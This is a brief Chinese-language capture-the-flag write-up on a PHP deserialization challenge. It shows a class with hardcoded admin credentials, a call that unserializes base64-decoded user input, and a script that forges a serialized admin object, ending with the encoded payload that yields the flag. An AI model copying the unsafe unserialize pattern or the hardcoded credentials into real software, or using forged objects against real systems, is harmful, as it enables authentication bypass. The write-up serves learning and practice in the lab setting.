题目提示反序列化
源码
<?phpclass User {public $username;public $password;function __construct($username, $password) {$this->username = $username;$this->password = $password;}function isValid() { return $this->username === 'admin' && $this->password === 'secure_password'; }}?>
题目中有一行$user = unserialize(base64_decode($data));
//将一个Base64编码的字符串$data解码并反序列化
根据编码写出解题脚本
<?phpclass User{public $username;public $password;
}
$a=new User();
$a->username="admin";
$a->password="secure_password";
echo base64_encode(serialize($a));?>
运行结果
Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjg6InBhc3N3b3JkIjtzOjE1OiJzZWN1cmVfcGFzc3dvcmQiO30=
输入后出现flag